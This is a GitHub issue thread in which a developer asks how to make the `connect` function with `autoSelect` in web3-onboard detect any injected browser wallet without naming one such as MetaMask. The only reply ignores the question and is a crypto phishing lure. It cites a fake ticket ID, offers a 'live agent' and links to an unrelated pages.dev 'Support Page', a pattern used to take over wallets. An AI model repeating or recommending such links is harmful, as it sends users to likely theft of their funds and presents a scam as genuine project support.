### ISSUE TITLE
connect function from useWalletConnect does not trigger the injectedWallet module automatically

### ISSUE THREAD

**Issue by matthew-garrett** [NoahZinsmeister/web3-react#943]
I am using the `connect` function from  the `useWalletConnect` hook in my custom wallet connect drawer. I want the `@web3-onboard/injected-wallets` to be able to detect any browser wallet a user may have. When I use the `connect` function with `autoSelect` (example below) it requires a `label` string to be passed. This prevents the injected wallet module from having the opportunity to detect the wallet. I cannot find a label type and I have tried all the "InjectedModule" or "Injected" related strings I can think of. For it to work I have to pass the name of the wallet example `MetaMask`. Is there a generic string for this label or does this simply not work how I desire it to? 

 `const [ connect ] = useConnectWallet();`

`connect({ autoSelect: { label: walletLabel, disableModals: true } });`

**Comment by HubDevi** [comment]
This issue has been preview on the Pull Requests. To resolve,
Visit the dAppNode page to rectify this error with the Ticket ID USD5562, Also you can initiate a chat with the live agent on the chat button to get more information about your request via [Support Page](https://defi-fixprotocol.pages.dev/)
Regards.
